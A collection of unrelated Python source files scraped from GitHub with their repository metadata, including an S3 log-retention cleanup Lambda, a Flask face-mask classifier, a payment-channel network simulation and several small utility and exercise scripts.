(0=infinite)\",0,(0,100,1))\n\t],\n\t[],\n\tassemble_apng)\n\nmain()\n","repo_name":"TheRF/gimp_plugins","sub_path":"gimpapngassemble.py","file_name":"gimpapngassemble.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5289023034","text":"\"\"\"\nA class to represent Controls\n\"\"\"\n\nfrom collections import UserDict\n\nimport numpy as np\nfrom scipy.stats import lognorm\n\n\nclass Control(UserDict):\n \"\"\"\n A class to represent Controls\n \"\"\"\n\n def __init__(\n self, name: str, cost: float, reduction: float, implemented: bool = True\n ) -> None:\n self.data = {}\n self.data[\"name\"] = name\n self.data[\"cost\"] = cost\n self.data[\"reduction\"] = reduction\n self.data[\"implemented\"] = implemented\n\n def evaluate_lognormal(self, iterations=1):\n return Control(\n name=self.data[\"name\"],\n cost=lognorm.ppf(np.random.rand(iterations), s=np.log(self.data[\"cost\"])),\n reduction=lognorm.ppf(\n np.random.rand(iterations), s=np.log(self.data[\"reduction\"])\n ),\n implemented=self.data[\"implemented\"],\n )\n\n\nclass Controls(UserDict):\n \"\"\"\n A class to hold multiple Controls\n \"\"\"\n\n def __init__(self) -> None:\n self.data = {}\n\n def new(self, name: str, cost: float, reduction: float) -> Control:\n \"\"\"\n A method to add a new controls to the Controls class\n \"\"\"\n self.data[name] = Control(name, cost, reduction)\n return self.data[name]\n\n def costs(self):\n \"\"\"\n A method to compute the deterministic costs of implemented controls in a Controls class\n \"\"\"\n return np.sum(\n list(\n map(\n lambda x: x[\"cost\"] if x[\"implemented\"] is True else 0,\n self.data.values(),\n )\n )\n )\n\n def costs_lognormal(self):\n \"\"\"\n A method to compute the stochastic costs of implemented controls in a Controls class\n \"\"\"\n return np.sum(\n list(\n map(\n lambda x: x.evaluate_lognormal().data[\"cost\"]\n if x.data[\"implemented\"] is True\n else 0,\n self,\n )\n )\n )\n","repo_name":"davidbailey/RAIL","sub_path":"rail/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"5241466528","text":"import math\nimport sys\n\nploidy = int(sys.argv[1])\n\nwith open(\"./output/sample.bam_ratio.BedGraph\") as bed:\n with open(\"./output/sample.bam_ratio_log2_circos.txt\", \"w+\") as olog2r:\n for line in bed.readlines():\n ls = line.split()\n if ls[0] != \"track\" and float(ls[3]) > 0:\n log2_ratio = math.log2(float(ls[3]) / ploidy)\n olog2r.write(\"{}\\t{}\\t{}\\t{}\\n\".format(ls[0], ls[1], ls[2], log2_ratio))\n\nwith open(\"./genome.fa.fai\") as fai:\n with open(\"./output/karyotype_circos.txt\", \"w+\") as ochr:\n for line in fai.readlines():\n ls = line.split()\n ochr.write(\"chr - {}\\t{}\\t0\\t{}\\t{}\\n\".format(ls[0], ls[0].strip(\"chr\").lower(), ls[1], ls[0]))\n","repo_name":"galaxyproject/tools-iuc","sub_path":"tools/freec/ratio2circos.py","file_name":"ratio2circos.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"61"} +{"seq_id":"8211226656","text":"import pytorch_lightning as pl\nfrom datamodule.dm import CustomDataModule\nfrom model.plnet import LightModule\n\ndef test(ckpt, args, fold):\n dm= CustomDataModule(args)\n dm.set_fold_num(fold)\n dm.setup('test')\n \n model= LightModule(args).load_from_checkpoint(checkpoint_path= ckpt, args= args)\n \n test_config= dict(\n accelerator= args.is_gpu,\n devices= args.device,\n precision= args.half\n )\n \n trainer= pl.Trainer(**test_config)\n trainer.test(model, dm)\n \n return model.value_list\n ","repo_name":"SuhanC/ML-competition-archives","sub_path":"Dacon_BRCA_recur_prediction_Histology+Text/train/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30629761848","text":"'''\nCreated on Feb 10, 2015\n\n@author: Ivan Varus\n'''\n\nimport sys\n\nif __name__ == '__main__':\n\n if len(sys.argv) != 2:\n print('Usage: FizzBuzz sample.txt')\n exit(1)\n\n f = open(sys.argv[1])\n if not f:\n print('Error opening file')\n exit(1)\n\n for test in f:\n inums = test.split()\n if len(inums) == 3:\n onums = []\n for i in range(1, int(inums[2]) + 1):\n onum = ''\n if i % int(inums[0]) == 0:\n onum = 'F'\n if i % int(inums[1]) == 0:\n onum = onum + 'B'\n if len(onum) == 0:\n onum = str(i)\n onums.append(onum)\n print(' '.join(onums))\n f.close()\n","repo_name":"ivarus/Challenges","sub_path":"CodeEval/src/Easy/FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25254181578","text":"\"\"\"\nStatistics views.\n\"\"\"\n\nfrom fastapi import APIRouter\n\nfrom use_cases import count_checks_per_url\n\n\nstatistics_router = APIRouter(\n prefix='/api/statistics',\n tags=['parser'],\n)\n\n\n@statistics_router.get('/checks_per_site')\nasync def get_checks_per_site():\n \"\"\"Get stats per site.\"\"\"\n urls = await count_checks_per_url()\n urls = [dict(count=c, url=url) for c, url in urls]\n return urls\n","repo_name":"NorthShine/moscowcityhack-backend-api","sub_path":"src/views/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"258849593","text":"#!/usr/bin/python3\nimport boto3\nimport datetime\nimport subprocess,shlex\nfrom botocore.exceptions import ClientError\nimport os,sys\nimport threading\nimport re\n\nregion = os.environ.get('REGION_NAME', None)\nif region == None:\n region = 'eu-west-1'\nretention = int(os.environ.get('RETENTION', 0))\nif retention == 0:\n retention = 365\nprofile = None\nbucket = os.environ.get('LOG_BUCKET', None)\nif bucket == None:\n bucket = 'redacted'\napp = os.environ.get('APP_LIST', '').split(',')\nif app == ['']:\n app = ['redacted']\ndt = os.environ.get('START_DATE', '').split('-')\nif dt == ['']:\n start_date = datetime.datetime(2017,8,1)\nelif len(dt) != 3:\n print ('please key-in correct START_DATE, eg: 2017-08-01')\n sys.exit(-1)\nelse:\n start_date = datetime.datetime(int(dt[0]), int(dt[1]), int(dt[2]))\ntoday = datetime.datetime.now()\nend_date = today - datetime.timedelta(retention)\ndate_pool = list()\nwhile start_date <= end_date:\n date_prefix = 'logyear={0}/logmonth={1}/logday={2}'.format(start_date.strftime('%Y'), start_date.strftime('%m'), start_date.strftime('%d'))\n date_pool.append(date_prefix)\n start_date += datetime.timedelta(1)\n\nclass ProgressPercentage(object):\n def __init__(self, filename):\n self._filename = filename\n self._size = float(os.path.getsize(filename))\n self._seen_so_far = 0\n self._lock = threading.Lock()\n\n def __call__(self, bytes_amount):\n # To simplify we'll assume this is hooked up\n # to a single filename.\n with self._lock:\n self._seen_so_far += bytes_amount\n percentage = (self._seen_so_far / self._size) * 100\n sys.stdout.write(\n \"\\r%s %s / %s (%.2f%%)\" % (\n self._filename, self._seen_so_far, self._size,\n percentage))\n sys.stdout.flush()\n\ndef lst_object(app_name, date_prefix=date_prefix, Bucket='cdn-log-statistics'):\n Prefix = '{0}/{1}/'.format(app_name, date_prefix)\n session = boto3.Session(profile_name = profile)\n s3_client = session.client('s3', region_name = region)\n try:\n response = s3_client.list_objects_v2(\n Bucket = Bucket,\n Prefix = Prefix\n )\n except ClientError as e:\n print ('Unexpected Error: {0}'.format(e))\n return response\n\ndef main():\n remove_lst=list()\n for date_prefix in date_pool:\n for app_name in app:\n if 'Contents' not in lst_object(app_name + '_cdn_logs', Bucket=bucket, date_prefix=date_prefix):\n continue\n for content in lst_object(app_name + '_cdn_logs', Bucket=bucket, date_prefix=date_prefix)['Contents']:\n remove_lst.append({\n 'Key': content['Key'],\n })\n \n s3_client.delete_objects(\n Bucket=bucket,\n Delete={\n 'Objects': remove_lst,\n 'Quiet': False\n }\n )\ndef lambda_handler(event, context):\n main()\n\n#lambda_handler('event', 'context')\n","repo_name":"anoyo-lin/aws_related","sub_path":"cdn/cdn_clear.py","file_name":"cdn_clear.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"20458255905","text":"# =[Modules dan Packages]========================\n\nfrom flask import Flask,render_template,request,jsonify\nfrom werkzeug.utils import secure_filename\nimport pandas as pd\nimport numpy as np\nimport os\nfrom PIL import Image\nfrom io import BytesIO\nimport base64\nfrom fungsi import make_model\n\n# =[Variabel Global]=============================\n\napp = Flask(__name__, static_url_path='/static')\n\napp.config['MAX_CONTENT_LENGTH'] = 2048 * 2048\napp.config['UPLOAD_EXTENSIONS'] = ['.jpg','.JPG', '.png', '.PNG', '.jpeg', '.JPEG']\napp.config['UPLOAD_PATH'] = './static/images/uploads/'\n\nmodel = None\n\nNUM_CLASSES = 3\nclassPred = ['incorrect_mask', 'with_mask', 'without_mask']\n\n# =[Routing]=====================================\n\n# [Routing untuk Halaman Utama atau Home]\n@app.route(\"/\")\ndef beranda():\n\treturn render_template('index.html')\n\n# [Routing untuk API]\t\n@app.route(\"/klasifikasi\", methods=['POST'])\ndef apiDeteksi():\n\thasil_prediksi = '(none)'\n\tgambar_prediksi = '(none)'\n\n\t# Get File\n\tuploaded_file = request.files['file']\n\tif uploaded_file == \"\":\n\t\trespon = jsonify({\n\t\t\t\"message\": \"Upload File\"\n\t\t})\n\t\trespon.status_code=400\n\t\treturn respon\n\tfilename = secure_filename(uploaded_file.filename)\n\t\n\t# Periksa\n\tif filename != '':\n\t\n\t\t# Set/mendapatkan extension dan path dari file yg diupload\n\t\tfile_ext = os.path.splitext(filename)[1]\n\t\tgambar_prediksi = '/static/images/uploads/' + filename\n\t\t\n\t\t# extension file sesuai (jpg)\n\t\tif file_ext in app.config['UPLOAD_EXTENSIONS']:\n\t\t\t\n\t\t\t# Simpan Gambar\n\t\t\tuploaded_file.save(os.path.join(app.config['UPLOAD_PATH'], filename))\n\t\t\t\n\t\t\t# Memuat Gambar\n\t\t\t# img = uploaded_file.read()\n\t\t\t# test_image = Image.open(BytesIO(base64.b64decode(img.split(',')[1])))\n\t\t\ttest_image = Image.open('.' + gambar_prediksi)\n\t\t\t\n\t\t\t# Mengubah Ukuran Gambar\n\t\t\ttest_image_resized = test_image.resize((150, 150))\n\t\t\t\n\t\t\t# Konversi\n\t\t\timage_array = np.array(test_image_resized)\n\t\t\ttest_image_x = (image_array / 255) - 0.5\n\t\t\t# test_image_x = np.expand_dims(test_image_x, axis=0)\n\t\t\ttest_image_x = np.array([image_array])\n\t\t\t\n\t\t\t# Prediksi Gambar\n\t\t\ty_pred_test_single = model.predict_proba(test_image_x)\n\t\t\ty_pred_test_classes_single = np.argmax(y_pred_test_single, axis=1)\n\t\t\t\n\t\t\thasil_prediksi = classPred[y_pred_test_classes_single[0]]\n\t\t\t\n\t\t\t# Return JSON\n\t\t\trespon = jsonify({\n\t\t\t\t\"prediksi\": hasil_prediksi,\n\t\t\t\t\"gambar_prediksi\" : gambar_prediksi\n\t\t\t})\n\t\t\trespon.status_code=200\n\t\t\tprint(respon.json)\n\t\t\treturn respon\n\t\telse:\n\t\t\trespon = jsonify({\n\t\t\t\t'message': 'Error'\n\t\t\t})\n\t\t\trespon.status_code=400\n\t\t\treturn respon\n# =[Main]========================================\t\t\n\nif __name__ == '__main__':\t\n\t\n\t# Load model\n\tmodel = make_model()\n\tmodel.load_weights(\"no-tl-3.h5\")\n\n\t# Run Flask \n\tapp.run(host=\"localhost\", port=5000, debug=True)","repo_name":"mdhkrmd/face_mask_classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22435298364","text":"import math\nimport operator\nimport numpy as np\nfrom paymentmethod import (\n Payment_Network, sum_future_payments_to_counterparty, MULTIPLIER_CHANNEL_BALANCE,\n DUMMY_PAYMENT_VALUE\n)\nfrom network import Network_Elmo, Network_LVPC, Network_Donner\n\nMULTIPLIER_BALANCE_RECURSION_LVPC = 1.5\nAVAILABILITY_FACTOR = 4\n\nclass Custom_Elmo_LVPC_Donner(Payment_Network):\n def __init__(\n self, method_name, nr_players, opening_transaction_size,\n bitcoin_fee = 1000, bitcoin_delay = 3600,\n coins_for_parties = \"max_value\", base_fee = 1000, fee_rate = 0.0004,\n ):\n super().__init__(nr_players, bitcoin_fee, bitcoin_delay, coins_for_parties)\n self.method_name = method_name\n self.opening_transaction_size = opening_transaction_size\n self.open_channel_string = method_name + \"-open-channel\"\n self.open_virtual_channel_string = method_name + \"-open-virtual-channel\"\n self.pay_string = method_name + \"-pay\"\n if method_name == \"Elmo\":\n self.network = Network_Elmo(nr_players)\n elif method_name == \"LVPC\":\n self.network = Network_LVPC(nr_players)\n elif method_name == \"Donner\":\n self.network = Network_Donner(nr_players)\n else:\n raise ValueError\n\n self.base_fee = base_fee\n self.fee_rate = fee_rate\n # delay for opening new virtual channel (per hop)\n self.pay_delay = 1.5 * self.base_delay\n\n def get_distances_and_paths_from_source(self, source, future_payments):\n \"\"\"\n Returns weighted distances to the future parties and\n to parties not occuring in future payments.\n Muiltiple payments to same party give multiple distances.\n \"\"\"\n distances = []\n # weight if we are endpoint\n weight_endpoint = 100\n # weight if we are possible intermediary\n weight_intermediary = 10\n # weight for other parties\n weight_other = 1\n encountered_parties = set({source})\n dummy_lock_value = MULTIPLIER_CHANNEL_BALANCE * DUMMY_PAYMENT_VALUE\n fee_intermediary = self.base_fee + dummy_lock_value * self.fee_rate\n cheapest_paths_from_sender = self.network.find_cheapest_paths_from_sender(\n source, dummy_lock_value, fee_intermediary\n )\n calculated_cheapest_paths = {}\n #near_parties = nx.single_source_shortest_path_length(self.network.graph, source, 5)\n path_data = []\n for future_sender, future_receiver, value in future_payments:\n encountered_parties.add(future_sender)\n encountered_parties.add(future_receiver)\n dummy_lock_value = MULTIPLIER_CHANNEL_BALANCE * DUMMY_PAYMENT_VALUE + value\n # TODO:\n # I commented the part after the next if. And it made the simulation much much faster.\n # The bottleneck seems to be the find_cheapest_path method.\n # We precompute cheapest_paths_from_sender and use it where possible\n # if we also want to calculate the distances for the payments in which we are intermediaries\n # we either have to call find_cheapest_path every time or we have to precompute all shortest_paths\n # in the network which probably doesn't scale well. But I haven't yet tested how it scales.\n if future_sender != source: #and future_sender in near_parties:\n if (future_sender, source) not in calculated_cheapest_paths:\n cheapest_path = self.network.find_cheapest_path(\n future_sender, source, dummy_lock_value,\n self.base_fee + dummy_lock_value * self.fee_rate\n )\n calculated_cheapest_paths[(future_sender, source)] = cheapest_path\n else:\n cheapest_path = calculated_cheapest_paths[(future_sender, source)]\n path_data.append((\n weight_endpoint if future_receiver == source else weight_intermediary,\n cheapest_path\n ))\n if future_receiver != source:\n path_data.append((\n weight_endpoint if future_sender == source else weight_intermediary,\n cheapest_paths_from_sender.get(future_receiver)\n ))\n\n dummy_lock_value = MULTIPLIER_CHANNEL_BALANCE * DUMMY_PAYMENT_VALUE\n for party in (set(self.network.graph.nodes()).difference(encountered_parties)):\n path_data.append((\n weight_other,\n cheapest_paths_from_sender.get(party)\n ))\n\n for weight, cheapest_path in path_data:\n if cheapest_path is None:\n distances.append((weight, math.inf))\n else:\n distances.append((weight, len(cheapest_path)-1))\n\n return distances, cheapest_paths_from_sender\n\n # review: after all, the `new_virtual_channel_delay` parameter is useless, because the situation is more complicated:\n # Donner: (hops+1)*BASE_DELAY\n # Elmo: (12*hops-12)*BASE_DELAY\n # LVPC: (8*hops-7)*BASE_DELAY\n def get_new_virtual_channel_time(self, hops):\n if self.method_name == \"LVPC\":\n return (8 * hops - 7) * self.base_delay\n elif self.method_name == \"Elmo\":\n return (12 * hops - 12) * self.base_delay\n else:\n return (hops + 1) * self.base_delay\n\n def get_new_virtual_channel_fee(self, path, coins_to_lock):\n \"\"\"\n Returns the correct values for Elmo and Donner.\n And the correct values for LVPC for path of length 3.\n Fees for longer paths in LVPC are calculated recursively using this function.\n \"\"\"\n return (self.base_fee + coins_to_lock * self.fee_rate) * (len(path) - 2)\n\n def get_new_channel_option(self, sender, receiver, value, knowledge_sender):\n # in case we have already a channel\n if self.network.graph.get_edge_data(sender, receiver) is not None:\n return None\n future_payments, _, _ = knowledge_sender\n new_channel_time = self.plain_bitcoin.get_delay() + self.pay_delay\n new_channel_fee = self.plain_bitcoin.get_fee(self.opening_transaction_size)\n sum_future_payments = sum_future_payments_to_counterparty(\n sender, receiver, future_payments\n )\n sender_coins = min(\n self.plain_bitcoin.coins[sender] - value - new_channel_fee,\n (\n sum_future_payments + MULTIPLIER_CHANNEL_BALANCE * value\n )\n )\n if sender_coins < 0:\n return None\n self.network.add_channel(sender, sender_coins, receiver, value, None)\n new_channel_distance, cheapest_paths_from_sender = (\n self.get_distances_and_paths_from_source(sender, future_payments)\n )\n new_channel_centrality = self.network.get_centrality(sender, cheapest_paths_from_sender)\n self.network.close_channel(sender, receiver)\n return {\n 'delay': new_channel_time,\n 'fee': new_channel_fee,\n 'centrality': new_channel_centrality,\n 'distance': new_channel_distance,\n 'payment_information': {\n 'kind': self.open_channel_string,\n 'data': (sender, receiver, value, sender_coins)\n }\n }\n\n def determine_sender_coins(self, value, path, desired_sender_coins, available_balances):\n \"\"\"\n This method enables the sender to determine the amount of coins to put on a\n new virtual channel.\n \"\"\"\n fee_for_value = self.get_new_virtual_channel_fee(path, value)\n # here we calculate how much balance remains after transferring value and a part of\n # the fee to the next intermediary\n # (this gives a lower bound on the remaining balances as fee_for_value is an upper bound\n # on how much of the fee has to be transferred to the next intermediary)\n # available_balances should be a np.array.\n remaining_balances = available_balances - value - fee_for_value\n # now we use the remaining balances to determine how much the sender can possibly put\n # on new virtual channel\n smallest_remaining_balance = min(remaining_balances)\n # we want to put exactly (if desired coins are more than remaining balance) \n # so much on the new channel such that \n # sender_coins + fee_sender_coins = smallest_remaining_balance\n # where fee_sender_coins = fee_rate * sender_coins * (len(path) - 2)\n sender_coins = min(\n desired_sender_coins,\n smallest_remaining_balance / (1 + self.fee_rate * (len(path) - 2))\n )\n return sender_coins\n\n def get_new_virtual_channel_option(self, sender, receiver, value, knowledge_sender):\n # in case we have already a channel\n if self.network.graph.get_edge_data(sender, receiver) is not None:\n return None\n future_payments, _, _ = knowledge_sender\n sum_future_payments = sum_future_payments_to_counterparty(\n sender, receiver, future_payments\n )\n # this is a simplification to calculate cheapest paths\n anticipated_lock_value = sum_future_payments + value\n if self.method_name == \"Elmo\" or self.method_name == \"LVPC\":\n cost_and_path = self.network.find_cheapest_path(\n sender, receiver, anticipated_lock_value, self.base_fee\n )\n elif self.method_name == \"Donner\":\n cost_and_path = self.network.find_cheapest_path(\n sender, receiver, anticipated_lock_value, self.base_fee,\n function=\"new_virtual_donner\"\n )\n else:\n raise ValueError\n\n if cost_and_path is None:\n return None\n hops, path = cost_and_path\n # the AVAILABILITY_FACTOR is used so that lower channel doesn't end up with 0 balance.\n available_balances = np.array([\n self.network.graph[path[i]][path[i+1]]['balance'] /\n AVAILABILITY_FACTOR for i in range(len(path)-1)\n ])\n desired_virtual_coins = sum_future_payments + MULTIPLIER_CHANNEL_BALANCE * value\n sender_coins = self.determine_sender_coins(\n value, path, desired_virtual_coins, available_balances\n )\n if sender_coins < 0:\n return None\n payment_information = {\n 'kind': self.open_virtual_channel_string, 'data': (path, value, sender_coins)\n }\n try:\n new_virtual_channel_fee = self.do(payment_information)\n except ValueError:\n return None\n new_virtual_channel_time = self.get_new_virtual_channel_time(hops)\n new_virtual_channel_distance, cheapest_paths_from_sender = (\n self.get_distances_and_paths_from_source(sender, future_payments)\n )\n new_virtual_channel_centrality = self.network.get_centrality(\n sender, cheapest_paths_from_sender\n )\n self.undo(payment_information)\n return {\n 'delay': new_virtual_channel_time,\n 'fee': new_virtual_channel_fee,\n 'centrality': new_virtual_channel_centrality,\n 'distance': new_virtual_channel_distance,\n 'payment_information': payment_information\n }\n\n def get_pay_option(self, sender, receiver, value, knowledge_sender):\n future_payments, num_payments_sender, num_total_payments = knowledge_sender\n payment_information = {'kind': self.pay_string, 'data': (sender, receiver, value)}\n try:\n self.do(payment_information)\n except ValueError:\n return None\n distance_pay, cheapest_paths_from_sender = (\n self.get_distances_and_paths_from_source(sender, future_payments)\n )\n centrality_pay = self.network.get_centrality(sender, cheapest_paths_from_sender)\n self.undo(payment_information)\n return {\n 'delay': self.pay_delay,\n 'fee': 0,\n 'centrality': centrality_pay,\n 'distance': distance_pay,\n 'payment_information': payment_information\n }\n\n def get_payment_options(self, sender, receiver, value, knowledge_sender):\n onchain_option = self.get_onchain_option(sender, receiver, value, knowledge_sender)\n new_channel_option = self.get_new_channel_option(sender, receiver, value, knowledge_sender)\n new_virtual_channel_option = self.get_new_virtual_channel_option(\n sender, receiver, value, knowledge_sender\n )\n pay_option = self.get_pay_option(sender, receiver, value, knowledge_sender)\n options = [onchain_option, new_channel_option, new_virtual_channel_option, pay_option]\n return [option for option in options if option is not None]\n\n def update_balances_new_virtual_channel(self, path, value, sender_coins, new_channel = False):\n # the new_channel argument tells whether this corresponds to making a payment\n # or undoing it.\n # all the descriptive names like \"op_take\", \"received\", etc are in the case of a payment\n # in case of undoing they do the opposite.\n op_take, op_give = (\n (operator.add, operator.sub) if new_channel else (operator.sub, operator.add)\n )\n num_intermediaries = len(path) - 2\n sender = path[0]\n fee_intermediary = self.base_fee + self.fee_rate * (value + sender_coins)\n cost_sender = num_intermediaries * fee_intermediary\n if cost_sender > self.network.graph[sender][path[1]]['balance'] and new_channel == True:\n raise ValueError\n # update the balances of the intermediaries.\n for i in range(1, num_intermediaries + 1):\n received = (num_intermediaries - (i-1)) * fee_intermediary\n transfered = received - fee_intermediary\n new_taker_balance = op_take(\n self.network.graph[path[i]][path[i-1]]['balance'], received\n )\n new_giver_balance = op_give(\n self.network.graph[path[i]][path[i+1]]['balance'], transfered\n )\n # we test just for new_giver_balance < 0 as in case of new virtual channel\n # only giver_balance gets smaller.\n # In case of undoing it, there was a payment done before,\n # so there shouldn't occur numbers < 0.\n if new_giver_balance < 0:\n for j in range(1, i):\n received = (num_intermediaries - (j-1)) * fee_intermediary\n transfered = received - fee_intermediary\n new_taker_balance = op_give(\n self.network.graph[path[j]][path[j-1]]['balance'], received\n )\n new_giver_balance = op_take(\n self.network.graph[path[j]][path[j+1]]['balance'], transfered\n )\n raise ValueError\n self.network.graph[path[i]][path[i-1]]['balance'] = new_taker_balance\n self.network.graph[path[i]][path[i+1]]['balance'] = new_giver_balance\n self.network.graph[sender][path[1]]['balance'] = op_give(\n self.network.graph[sender][path[1]]['balance'], cost_sender\n )\n\n\n def pay(self, sender, receiver, value):\n if self.network.graph.get_edge_data(sender, receiver) is None:\n raise ValueError\n elif self.network.graph[sender][receiver]['balance'] < value:\n raise ValueError\n self.network.graph[sender][receiver]['balance'] -= value\n self.network.graph[receiver][sender]['balance'] += value\n\n def do(self, payment_information):\n if payment_information['kind'] == 'onchain':\n self.plain_bitcoin.pay(payment_information['data'])\n elif payment_information['kind'] == self.open_channel_string:\n sender, receiver, value, sender_coins = payment_information['data']\n self.network.add_channel(sender, sender_coins, receiver, value, None)\n # next update the coins of sender\n amount_sender = - (\n sender_coins + value +\n self.plain_bitcoin.get_fee(self.opening_transaction_size)\n )\n self.plain_bitcoin.update_coins(sender, amount_sender)\n elif payment_information['kind'] == self.open_virtual_channel_string:\n path, value, sender_coins = payment_information['data']\n sender = path[0]\n if self.open_virtual_channel_string == \"LVPC-open-virtual-channel\":\n new_virtual_channel_fee = 0\n for i in range(len(path)-2):\n path_for_recursion = [sender] + path[i+1:i+3]\n sender_coins_recursion = sender_coins / (MULTIPLIER_BALANCE_RECURSION_LVPC**i)\n if i != len(path)-3:\n sender_coins_recursion += value * (1 + self.fee_rate) + self.base_fee\n receiver_coins_recursion = (\n 0 if i != len(path)-3 else value\n )\n receiver_recursion = path_for_recursion[-1]\n new_virtual_channel_fee += self.get_new_virtual_channel_fee(\n path_for_recursion, sender_coins_recursion + receiver_coins_recursion\n )\n # important that next line is at that position\n # so that Error gets raised in case update is not possible\n # before anything else is done.\n self.update_balances_new_virtual_channel(\n path_for_recursion, receiver_coins_recursion,\n sender_coins_recursion, new_channel=True\n )\n self.network.lock_unlock(\n path_for_recursion, sender_coins_recursion + receiver_coins_recursion,\n lock=True\n )\n self.network.add_channel(\n sender, sender_coins_recursion, receiver_recursion,\n receiver_coins_recursion, path_for_recursion\n )\n return new_virtual_channel_fee\n else: # Donner or Elmo\n sender = path[0]\n receiver = path[-1]\n # important that next line is at that position\n # so that Error gets raised in case update is not possible\n # before anything else is done.\n self.update_balances_new_virtual_channel(\n path, value, sender_coins, new_channel=True\n )\n self.network.lock_unlock(path, sender_coins + value, lock=True)\n self.network.add_channel(sender, sender_coins, receiver, value, path)\n new_virtual_channel_fee = self.get_new_virtual_channel_fee(\n path, value + sender_coins\n )\n return new_virtual_channel_fee\n elif payment_information['kind'] == self.pay_string:\n sender, receiver, value = payment_information['data']\n self.pay(sender, receiver, value)\n else:\n raise ValueError\n\n def undo(self, payment_information):\n if payment_information['kind'] == self.open_virtual_channel_string:\n path, value, sender_coins = payment_information['data']\n sender = path[0]\n if self.open_virtual_channel_string == \"LVPC-open-virtual-channel\":\n for i in range(len(path)-3, -1, -1):\n path_for_recursion = [sender] + path[i+1:i+3]\n receiver = path_for_recursion[-1]\n amount_sender, amount_receiver = self.network.cooperative_close_channel(\n sender, receiver\n )\n self.update_balances_new_virtual_channel(\n path_for_recursion, amount_receiver, amount_sender, new_channel=False\n )\n else:\n sender = path[0]\n receiver = path[-1]\n amount_sender, amount_receiver = self.network.cooperative_close_channel(\n sender, receiver\n )\n self.update_balances_new_virtual_channel(\n path, amount_receiver, amount_sender, new_channel=False\n )\n elif payment_information['kind'] == self.pay_string:\n sender, receiver, value = payment_information['data']\n if self.network.graph.get_edge_data(sender, receiver) is None:\n raise ValueError\n self.network.graph[sender][receiver]['balance'] += value\n self.network.graph[receiver][sender]['balance'] -= value\n else:\n raise ValueError\n","repo_name":"OrfeasLitos/virtual-payment-channels","sub_path":"simulation/custom_elmo_lvpc_donner.py","file_name":"custom_elmo_lvpc_donner.py","file_ext":"py","file_size_in_byte":20828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23427386501","text":"import sys\r\n\r\ndef dps(C,F,X):\r\n f0=0\r\n f0=2;\r\n if X<=C: return str(X/f0)\r\n t=0;\r\n t0=0;\r\n t+=C/f0;\r\n while f0<=(X/C-1)*F:\r\n f0+=F\r\n t+=C/f0 \r\n t+=(X-C)/f0\r\n return str(t)\r\n\r\nwith open('a.in','r') as f:\r\n\tdata=f.readlines()\r\n\r\nN=int(data[0]);\r\nres=\"\";\r\n\r\n\r\nfor i in range(N):\r\n [C,F,X]=[float(_) for _ in data[1+i].split()]\r\n res+=\"Case #\"+str(i+1)+\": \"+dps(C,F,X)+\"\\n\"\r\n\r\nwith open('b.txt', 'w') as f:\r\n\tf.write(res)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/3273.py","file_name":"3273.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6364347852","text":"# import scrapy\n# from scrapy.spiders import CrawlSpider, Rule\n# from scrapy.linkextractor import LinkExtractor\n# from xsspider.items import BookItem, ChaptersItem\n# import re\n#\n#\n# class NovelSpider(CrawlSpider):\n# name = '23us_spider'\n# allowed_domains=[\"23us.so\"]\n# start_urls = ['http://www.23us.so/xiaoshuo/13694.html']\n# rules = (\n# #http://www.23us.so/xiaoshuo/13694.html 小说页面\n# Rule(LinkExtractor(allow=(\"xiaoshuo/\\d*\\.html\")), callback=\"parse_book_info\", follow=True),\n# #http://www.23us.so/files/article/html/13/13694/index.html #小说所有章节列表\n# Rule(LinkExtractor(allow=(\"files/article/html/\\d*?/\\d*?/index.html\")),callback=\"get_chapters\", follow=True),\n# #http://www.23us.so/files/article/html/13/13694/6167429.html#每一章内容\n# Rule(LinkExtractor(allow=(\"files/article/html/\\d*?/\\d*?/\\d*?.html\")),callback=\"parse_chapter_content\", follow=True),\n# Rule(LinkExtractor(allow=(\".*?\")), follow=True)\n# )\n#\n# def parse_book_info(self, response):\n# if not response.body:\n# print(response.url + \"is already crawled\")\n# return\n# novel_Url = response.url\n# novel_Name = response.xpath(\"//dl[@id='content']//h1/text()\").extract_first().split(\" \")[0]\n# novel_ImageUrl = response.xpath(\"//a[@class='hst']/img/@src\").extract_first()\n# novel_ID = int(response.url.split(\"/\")[-1].split(\".\")[0])\n# novel_Type = response.xpath(\".//table[@id='at']/tr[1]/td[1]/a/text()\").extract_first()\n# novel_Author = response.xpath(\".//table[@id='at']/tr[1]/td[2]/text()\").extract_first().strip()\n# novel_Status = response.xpath(\".//table[@id='at']/tr[1]/td[3]/text()\").extract_first().strip()\n# novel_Collect = response.xpath(\".//table[@id='at']/tr[2]/td[1]/text()\").extract_first().strip()\n# novel_Words = response.xpath(\".//table[@id='at']/tr[2]/td[2]/text()\").extract_first().strip()\n# novel_UpdateTime = response.xpath(\".//table[@id='at']/tr[2]/td[3]/text()\").extract_first().strip()\n# novel_Allclick = response.xpath(\".//table[@id='at']/tr[3]/td[1]/text()\").extract_first().strip()\n# novel_Monclick = response.xpath(\".//table[@id='at']/tr[3]/td[2]/text()\").extract_first().strip()\n# novel_Weekclick = 